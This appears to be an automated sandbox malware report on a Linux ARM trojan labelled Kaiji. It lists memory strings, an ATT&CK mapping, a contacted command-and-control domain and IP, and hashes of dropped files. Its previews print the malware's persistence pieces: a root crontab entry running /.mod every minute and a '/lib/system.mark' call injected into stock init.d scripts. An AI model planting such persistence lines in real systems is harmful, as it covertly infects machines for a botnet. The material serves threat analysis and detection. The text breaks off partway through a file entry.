Source: libgdi.so.0.8.2, 5615.1.000055f20a579000.000055f20abe6000.rw-.sdmp, .mod, 5660.1.000055bd3e865000.000055bd3eed3000.rw-.sdmp, libgdi.so.0.8.2, 5660.1.000055bd3e865000.000055bd3eed3000.rw-.sdmp	Binary or memory string: Urg.qemu.gdb.arm.sys.regs">
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: libgdi.so.0.8.2, 5665.1.0000561405319000.0000561405986000.rw-.sdmp	Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: open-vm-tools.14.dr	Binary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 \|\| exit $?
Source: libgdi.so.0.8.2, 5665.1.0000561405319000.0000561405986000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/arm1RelativeDistinguishedName
Source: open-vm-tools.14.dr	Binary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1
Source: open-vm-tools.14.dr	Binary or memory string: if ! ${checktool} \| grep -iq vmware; then
Source: .mod, 5610.1.00007ffcea455000.00007ffcea476000.rw-.sdmp, libgdi.so.0.8.2, 5610.1.00007ffcea455000.00007ffcea476000.rw-.sdmp	Binary or memory string: aXx86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.2SHELL=/bin/shPWD=/rootLOGNAME=rootHOME=/rootLANG=en_US.UTF-8SHLVL=1PATH=/usr/bin:/bin_=/usr/lib/libgdi.so.0.8.2/usr/lib/libgdi.so.0.8.2
Source: libgdi.so.0.8.2, 5665.1.00007fffee83c000.00007fffee85d000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/usr/lib/libgdi.so.0.8.2
Source: libgdi.so.0.8.2, 5665.1.0000561405319000.0000561405986000.rw-.sdmp	Binary or memory string: Vrg.qemu.gdb.arm.sys.regs">
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: arm5.elf, 5434.1.0000557a19d4a000.0000557a1a3b8000.rw-.sdmp	Binary or memory string: zU!/etc/qemu-binfmt/arm
Source: open-vm-tools.14.dr	Binary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.dr	Binary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: libgdi.so.0.8.2, 5665.1.0000561405319000.0000561405986000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: libgdi.so.0.8.2, 5665.1.00007fffee83c000.00007fffee85d000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: .mod, 5610.1.00005610adc5d000.00005610ae2cb000.rw-.sdmp, libgdi.so.0.8.2, 5610.1.00005610adc5d000.00005610ae2cb000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/arm
Source: arm5.elf, 5434.1.00007fffde4f9000.00007fffde51a000.rw-.sdmp	Binary or memory string: ax86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: open-vm-tools.14.dr	Binary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid \|\| exit 2
Source: arm5.elf, 5434.1.0000557a19d4a000.0000557a1a3b8000.rw-.sdmp	Binary or memory string: zUrg.qemu.gdb.arm.sys.regs">

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Command and Scripting Interpreter	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	1 Hide Artifacts	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 File and Directory Permissions Modification	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
arm5.elf	18%	ReversingLabs	Linux.Trojan.Kaiji

Dropped Files

Source	Detection	Scanner	Label
/.mod	0%	ReversingLabs
/boot/system.pub	18%	ReversingLabs	Linux.Trojan.Kaiji
/etc/init.d/acpid	0%	ReversingLabs
/etc/init.d/alsa-utils	0%	ReversingLabs
/etc/init.d/anacron	0%	ReversingLabs
/etc/init.d/apparmor	0%	ReversingLabs
/etc/init.d/avahi-daemon	0%	ReversingLabs
/etc/init.d/bluetooth	0%	ReversingLabs
/etc/init.d/console-setup.sh	0%	ReversingLabs
/etc/init.d/cups	0%	ReversingLabs
/etc/init.d/cups-browsed	0%	ReversingLabs
/etc/init.d/dbus	0%	ReversingLabs
/etc/init.d/dns-udp4	0%	ReversingLabs
/etc/init.d/hddtemp	0%	ReversingLabs
/etc/init.d/irqbalance	0%	ReversingLabs
/etc/init.d/keyboard-setup.sh	0%	ReversingLabs
/etc/init.d/kmod	0%	ReversingLabs
/etc/init.d/mono-xsp4	0%	ReversingLabs
/etc/init.d/plymouth-log	0%	ReversingLabs
/etc/init.d/rsync	0%	ReversingLabs
/etc/init.d/saned	0%	ReversingLabs
/etc/init.d/screen-cleanup	0%	ReversingLabs
/etc/init.d/spice-vdagent	0%	ReversingLabs
/etc/init.d/ufw	0%	ReversingLabs
/etc/init.d/unattended-upgrades	0%	ReversingLabs
/etc/init.d/uuidd	0%	ReversingLabs
/etc/profile.d/bash.cfg	18%	ReversingLabs	Linux.Trojan.Kaiji
/etc/profile.d/bash.cfg.sh	0%	ReversingLabs
/usr/lib/libgdi.so.0.8.2	18%	ReversingLabs	Linux.Trojan.Kaiji
/usr/lib/system.mark	18%	ReversingLabs	Linux.Trojan.Kaiji

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
j.xuanxuan1997.com	93.123.109.118	true	false		unknown
www.google.com	142.250.186.164	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	false		unknown
http://upx.sf.net	arm5.elf, libgdi.so.0.8.2.14.dr, system.mark.14.dr, system.pub.14.dr, bash.cfg.14.dr	true	URL Reputation: safe	unknown
http://.css	libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	false		unknown
http://.jpg	libgdi.so.0.8.2, 5665.1.00007f7f144bf000.00007f7f14524000.rw-.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
93.123.109.118	j.xuanxuan1997.com	Bulgaria		48584	SARNICA-ASBG	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	142.250.184.228
	https://e.trustifi.com/#/fff2a6/655144/3ac50c/e93bb8/594e42/41c163/f1cd98/92ee40/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/848a7a/9632d0/879ea4/bcfc0d/744595/93daa1/f34456/a15015/3ddaed/fad545/1fd970/328bf8/9bb3f0/c514cd/df7a51/88456c/c9366d/790245/fb6752/33794d/6e0d28/60381b/a98a06/87eaef/01f4e4/642891/927008/b3d84b/be88ef/6f56ca/922d7f/c2017a/2b28ce/5f100a/ab5cfe/ca732f/ba9f64/6c13c0/db448e/12afff/ea859a/0054d0/06ab25/ddf455/c36939/fe771f/592f7f/fd9f55/51d733/4f5c46/02cddd/dbef71/7c02e0/b3eaba/7eac45/4a8768/a7dd16/2174e0/de559c/dacc2a/571f0f/f5f216/44ee34/abbbf4/b6cd49/d82da6/795ff3/bc1fdf/8febc7/4b7488/0cb4fb/7ef03b/a191c5/4d2316/483906/0c1e88	Get hash	malicious	Unknown	Browse	142.250.186.164
	9xNI7vE1XO.exe	Get hash	malicious	Clipboard Hijacker	Browse	142.250.184.228
	https://myworkspacec1d73.myclickfunnels.com/onlinereview--9097d?preview=true	Get hash	malicious	Unknown	Browse	142.250.186.132
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.184.196
	https://link.edgepilot.com/s/b064b0de/7_W48d8I8kGlXhrfD-hDUg?u=https://delivmodas.ks.infinitoag.com/	Get hash	malicious	Unknown	Browse	142.250.184.196
	6B530627-1802-4180-83E0-9D13C1074460.1_originalmail.eml	Get hash	malicious	Unknown	Browse	172.217.18.4
	https://1drv.ms/o/s!BOd5RNxFaxkGg1r5bc30bgQWmkNc?e=J67qxK-KfEurqpMk0dasTw&at=9	Get hash	malicious	Unknown	Browse	142.250.186.36
	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	142.250.186.164
	renier_visser-In Employee -11384.pdf	Get hash	malicious	Unknown	Browse	142.250.185.228

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SARNICA-ASBG	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160
	na.elf	Get hash	malicious	Mirai	Browse	93.123.109.160

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/acpid	sBKWt6JPZa.elf	Get hash	malicious	Unknown	Browse
	libgdi.so.0.8.2.elf	Get hash	malicious	Unknown	Browse
	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse
	0S3wxWer8x.elf	Get hash	malicious	Unknown	Browse
	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
/.mod	sBKWt6JPZa.elf	Get hash	malicious	Unknown	Browse
	libgdi.so.0.8.2.elf	Get hash	malicious	Unknown	Browse
	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse
	0S3wxWer8x.elf	Get hash	malicious	Unknown	Browse
	ausNOyj9by.elf	Get hash	malicious	Unknown	Browse
	W4bP4K6GeP.elf	Get hash	malicious	Unknown	Browse
	HvuWdJQMCR.elf	Get hash	malicious	Unknown	Browse
	Vij3FJ8y4o.elf	Get hash	malicious	Unknown	Browse
	adm64	Get hash	malicious	Unknown	Browse

Created / dropped Files

/.mod

Download File

Process:	/tmp/arm5.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	36
Entropy (8bit):	3.9931325576478587
Encrypted:	false
SSDEEP:	3:TKH/LQP5r:8M1
MD5:	77037D22D4F473F068BCE3E3318ACB01
SHA1:	8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
SHA-256:	2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
SHA-512:	AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: sBKWt6JPZa.elf, Detection: malicious, Browse Filename: libgdi.so.0.8.2.elf, Detection: malicious, Browse Filename: execute_and_cleanup.sh, Detection: malicious, Browse Filename: 0S3wxWer8x.elf, Detection: malicious, Browse Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse Filename: adm64, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/bash./usr/lib/libgdi.so.0.8.2

/boot/system.pub

Download File

Process:	/tmp/arm5.elf
File Type:	ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, no section header
Category:	dropped
Size (bytes):	1839196
Entropy (8bit):	7.88774426457939
Encrypted:	false
SSDEEP:	24576:/HYOihAEAI+m5ZL0gerrYlmCHso2QfZWeHsu6ljp4KaXVMc5R9eeah7tKdmTSNzx:/hiAvm5ZuOHsozfDMp4KaSnef3c7yfx
MD5:	2C40DA075F6D957E1B4E2E98543EFE89
SHA1:	CB1483B4DE0D4B6749CE26A5D61A55318E6CEA7F
SHA-256:	ABB8063C9DF05CF14DACA16F0DC86118389EE23EFE7746808317490710767406
SHA-512:	7BB703EEA559D92428A06C00490A2828DC1D3A64F59229780A772F53B4BB36D325B318C5746E5E56B90F2DAA9E48D2F4947D07697AC188482F3809B8337E213F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Reputation:	low
Preview:	.ELF..............(.........4...........4. ...(.........................................hO..hOQ.hOQ.................Q.td............................l;DcUPX!..........O...O.....z.........ELF......(.w......4&.^.... ...6......4.......w.........._d....M.....(.(]..'?o)./\|.. .`?.J.K/..l2hO...?Q.t...M....I$...4.(.!....P.........u.....N(..(r.r]w...)...+.O;..s.....+5..!n..e.(,6..N..I...o.0C6..N..Jdy..G6....%v.O.....X...5...K.J.@nO.....>K..N..d..9./.e.O.N..E.....O...O..NP..$r._..Pv.V.x...C.G........diM.....D...Sr.Go&.psVEtS3n.zn-VBfWu.-n2j/YcL.BcR4B0n_.ErVdkJNv.U/L-KnQB.TVJFfb2a.jHSbcX/S.6wZQJqzP.5v5M83pR7I........]..o....-..p........l. 7...~>P...&..7......................4Q............6...;..........t....0l..........twO.p:..o................(...........W..7...F;.....&....w$k......o....;.O,....u/.....=..?$...0y....~.<..8...uO..n.........{ ..P..../...@.....T...~.n.o.@............R..... .... \'..m>..#..8......g.......\.............Na'a....)...pi....... .?h...^l7..;..~.1a..@...P\|&.

/etc/.cfg

Download File

Process:	/tmp/arm5.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	171
Entropy (8bit):	3.8150018153307
Encrypted:	false
SSDEEP:	3:0dkTLQKTBWTsbGqdtbGqb/8TRkTLQKTBWTsbGqdtbGqb//sNUdYXRGXGOaYXRGXe:0d4MIBVD3DuR4MIBVD3DL6UgRGWARGWD
MD5:	648B66D937B090EDE0027543FB3DD9ED
SHA1:	5A9C90EC45E0DDFC0071D4A29A61CC5B5443E24C
SHA-256:	28EED615C582DCC8EF6DD5F902FCC375512829F042F03540957449B7C364D067
SHA-512:	10F13AC9B3914E1A2B4D5F79DAA831204D31004B3AD19FD4FDCE893873F5C1A3F7D92A523F630CE3D61C6E77AA37C5778F5229CEE4B3A367492C1B5DEEA17C1B
Malicious:	false
Reputation:	low
Preview:	e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263ea18.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263ea18.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910fdfd588618.

/etc/crontab

Download File

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	24
Entropy (8bit):	3.000961982762677
Encrypted:	false
SSDEEP:	3:HFdtKeIBFv:l6eIBV
MD5:	6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1:	8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256:	AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512:	76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/1 * * * root /.mod .

/etc/init.d/acpid

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2304
Entropy (8bit):	5.101745776620701
Encrypted:	false
SSDEEP:	48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
MD5:	6BBECC4CA13C3007B79B315AD5B8EB33
SHA1:	E32443A6D19709D269DFD58D5D48F23192F8ED82
SHA-256:	98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
SHA-512:	29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: sBKWt6JPZa.elf, Detection: malicious, Browse Filename: libgdi.so.0.8.2.elf, Detection: malicious, Browse Filename: execute_and_cleanup.sh, Detection: malicious, Browse Filename: 0S3wxWer8x.elf, Detection: malicious, Browse Filename: ausNOyj9by.elf, Detection: malicious, Browse Filename: W4bP4K6GeP.elf, Detection: malicious, Browse Filename: HvuWdJQMCR.elf, Detection: malicious, Browse Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] \|\| exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] \|\| return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod

/etc/init.d/alsa-utils

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	5694
Entropy (8bit):	5.4216099972768905
Encrypted:	false
SSDEEP:	96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
MD5:	25EEDDA5AB2F0AF6683A5A1365EF11A0
SHA1:	76963A11F9F43D6BC6336B0A9610C8668E0F3E79
SHA-256:	37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
SHA-512:	3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] \|\| exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

/etc/init.d/anacron

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2124
Entropy (8bit):	4.763929127414264
Encrypted:	false
SSDEEP:	24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
MD5:	816D2CB2EBBEA0A92840D29E03A3AEF2
SHA1:	DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
SHA-256:	2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
SHA-512:	5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron \|\| exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting

/etc/init.d/apparmor

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3826
Entropy (8bit):	5.2527487182090535
Encrypted:	false
SSDEEP:	96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
MD5:	026032FB398BC8D223FFFAC164EC8BDC
SHA1:	2804934FD92CE102B1B64E908DE69B93BDAF0F62
SHA-256:	7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
SHA-512:	CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

/etc/init.d/apport

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3050
Entropy (8bit):	5.219163763155702
Encrypted:	false
SSDEEP:	48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
MD5:	8669B5F957342072FF16241BEAA010FD
